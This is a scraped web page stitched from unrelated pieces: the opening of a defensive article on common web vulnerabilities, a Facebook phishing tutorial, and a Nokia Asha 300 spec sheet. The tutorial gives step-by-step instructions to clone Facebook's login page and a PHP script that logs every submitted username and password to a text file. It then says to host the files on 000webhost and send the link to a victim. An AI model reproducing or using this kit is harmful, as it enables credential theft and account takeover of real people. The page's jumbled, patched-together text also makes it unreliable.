Play Cool Games Online


10 Most Common Web Security Vulnerabilities by is one of the top web site which writes on web application security research. Here is post written by GERGELY KALMAN - Security specialist about

"10 Most Common Web Security Vulnerabilities"

For all too many companies, it’s not until after a breach has occurred that web security becomes a priority. During my years working as an IT Security professional, I have seen time and time again how obscure the world of IT Security is to so many of my fellow programmers.
An effective approach to IT security must, by definition, be proactive and defensive. Toward that end, this post is aimed at sparking a security mindset, hopefully injecting the reader with a healthy dose of paranoia.
In particular, this guide focuses on 10 common and significant web security pitfalls to be aware of, including recommendations on how they can be avoided. The focus is on the Top 10 Web Vulnerabilities identified by the Open Web Application Security Project (OWASP), an international, non-profit organization whose goal is to improve software security across the globe.

A little web security primer before we start – authentication and authorization

When speaking with other programmers and IT professionals, I often encounter confusion regarding the distinction between authorization and authentication. And of course, the fact the abbreviation auth is often used for both helps aggravate this common confusion. This confusion is so common that maybe this issue should be included in this post as “Common Web Vulnerability Zero”.
So before we proceed, let’s clearly the distinction between these two terms:
  • Authentication: Verifying that a person is (or at least appears to be) a specific user, since he/she has correctly provided their security credentials (password, answers to security questions, fingerprint scan, etc.).
  • Authorization: Confirming that a particular user has access to a specific resource or is granted permission to perform a particular action.
Stated another way, authentication is knowing who an entity is, while authorization is knowing what a given entity can do.

Hack Facebook account through Phising

What is phishing?

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

Facebook Phishing:

In Facebook Phishing we create our own page which is like Facebook page for that purpose we copy the source code of and make some amendment in it when the victim try to sin in he redirected on the webpage of our choice and it's email and password is sent to the hosting site and in this way we get it's account!

Facebook Hacking through Phishing:
Just Follow the following steps to make your own Facebook Phishing Page.
1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

Facebook Hacking
                                  a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.

facebook phishing script

4.You will have to find a text which looks like ..


5.delete all the text written in red colour and instead of it write post.php.then it will look like...


6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is will look like a pic given below .

hacking script

8.Open a new notepad and save the given data with the name post.php.

header ('Location:');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use

11.I prefer u to use 000webhost because it will be easy to use.
hosting website

12.You have to make a account in that ,after that it looks like a picture given below.

facebook script hosting website
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.


15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .

16.Now the last step click on view of index.htm it will look same as facebook page.

this is your Facebook phishing page

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.


19.Click on view now u will have your friend's password and email id.


20.This is a simple trick to hack any Facebook password account by phishing page.

I hope you will understand this!

You can also create phishing page of,,,,, etc. and can easily hack accounts!

Nokia Asha 300 Full specifications and Price

Nokia Asha 300 - Fun & Fast.
Get the speed that you need with Nokia Asha 300 when you want to go online, Make the home screen yours on Nokia Asha 300 with everything you want just a touch away, The Nokia Asha 300 makes staying in touch really easy. Update your Facebook status or send a tweet, Use the 5 MP camera of Nokia Asha 300 to snap all the nice things and the surprising things you find in your daily life.  

112.8 x 49.5 x 12.7 mm, 59 cc  

85 g  

Talk time Up to 6 h 54 min, Stand-by Up to 550 h, Music play Up to 28 h  

140 MB built-in, 128 MB RAM, 256 MB ROM + microSD card (supports up to 32GB) 

1 GHz 

Bluetooth v2.1 with A2DP, EDR, USB, GPRS, EDGE, 3G (HSDPA 10.2 Mbps, HSUPA 2 Mbps)  

 Display Size 
240 x 320 pixels, 2.4 inches, Proximity sensor  

 Display Colour 
TFT resistive touchscreen, 256K colors  

 Frequency / Band 

GSM 850 / 900 / 1800 / 1900 HSDPA 850 / 900 / 1900 / 2100  


Graphite, Night Shade, Gold, White Silver, Pink, Red  

Stereo FM radio with RDS, 3.5mm audio jack, MP4/H.264/H.263/WMV player, MP3/WAV/WMA/AAC player, SNS integration, Games (built-in + downloadable)  

5 MP, 2592x1944 pixels, fixed focus, Video (VGA 30fps)  

 Other Features 
Flash Lite support, Voice memo, Predictive text input, Speakerphone  

 Ring Tones 
Polyphonic, WAV, MP3  

SMS(threaded view), MMS, Email, Push Email, IM  

Price in Rs: 9,200    Price in USD: $107

Back to Top